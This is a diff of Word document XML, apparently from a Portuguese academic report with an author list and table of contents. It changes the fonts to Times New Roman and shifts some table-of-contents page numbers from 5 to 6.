         <w:t>47192</w:t>
@@ -150,29 +170,34 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve">- Diogo Cunha </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>47109</w:t>
@@ -190,125 +215,143 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
@@ -316,7 +359,7 @@
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
@@ -339,9 +382,15 @@
         <w:p>
           <w:pPr>
             <w:pStyle w:val="TOCHeading"/>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            </w:rPr>
           </w:pPr>
           <w:proofErr w:type="spellStart"/>
           <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            </w:rPr>
             <w:t>Índice</w:t>
           </w:r>
           <w:proofErr w:type="spellEnd"/>
@@ -353,7 +402,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:sz w:val="24"/>
@@ -362,12 +411,21 @@
             </w:rPr>
           </w:pPr>
           <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            </w:rPr>
             <w:fldChar w:fldCharType="begin"/>
           </w:r>
           <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            </w:rPr>
             <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
           </w:r>
           <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
           <w:hyperlink w:anchor="_Toc213038589" w:history="1">
@@ -382,6 +440,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -389,6 +448,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -396,6 +456,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -403,12 +464,14 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -416,6 +479,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -423,6 +487,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -438,7 +503,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:sz w:val="24"/>
@@ -458,7 +523,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:kern w:val="2"/>
                 <w:sz w:val="24"/>
@@ -489,6 +554,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -496,6 +562,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -503,6 +570,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -510,12 +578,14 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -523,6 +593,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -530,6 +601,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -545,7 +617,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:sz w:val="24"/>
@@ -565,7 +637,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:kern w:val="2"/>
                 <w:sz w:val="24"/>
@@ -585,6 +657,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -592,6 +665,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -599,6 +673,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -606,12 +681,14 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -619,6 +696,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -626,6 +704,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -641,7 +720,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:sz w:val="24"/>
@@ -661,7 +740,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:kern w:val="2"/>
                 <w:sz w:val="24"/>
@@ -681,6 +760,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -688,6 +768,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -695,6 +776,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -702,12 +784,14 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -715,6 +799,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -722,6 +807,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -737,7 +823,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:sz w:val="24"/>
@@ -757,7 +843,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:kern w:val="2"/>
                 <w:sz w:val="24"/>
@@ -777,6 +863,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -784,6 +871,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -791,6 +879,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -798,12 +887,14 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -811,6 +902,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -818,6 +910,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -833,7 +926,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:sz w:val="24"/>
@@ -853,7 +946,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:kern w:val="2"/>
                 <w:sz w:val="24"/>
@@ -873,6 +966,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -880,6 +974,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -887,6 +982,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -894,12 +990,14 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -907,13 +1005,15 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -929,7 +1029,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:sz w:val="24"/>
@@ -949,7 +1049,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:kern w:val="2"/>
                 <w:sz w:val="24"/>
@@ -969,6 +1069,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -976,6 +1077,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -983,6 +1085,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -990,12 +1093,14 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1003,13 +1108,15 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1025,7 +1132,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:kern w:val="2"/>
               <w:sz w:val="24"/>
@@ -1045,7 +1152,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:kern w:val="2"/>
                 <w:sz w:val="24"/>
@@ -1065,6 +1172,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1072,6 +1180,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1079,6 +1188,7 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1086,12 +1196,14 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1099,13 +1211,15 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
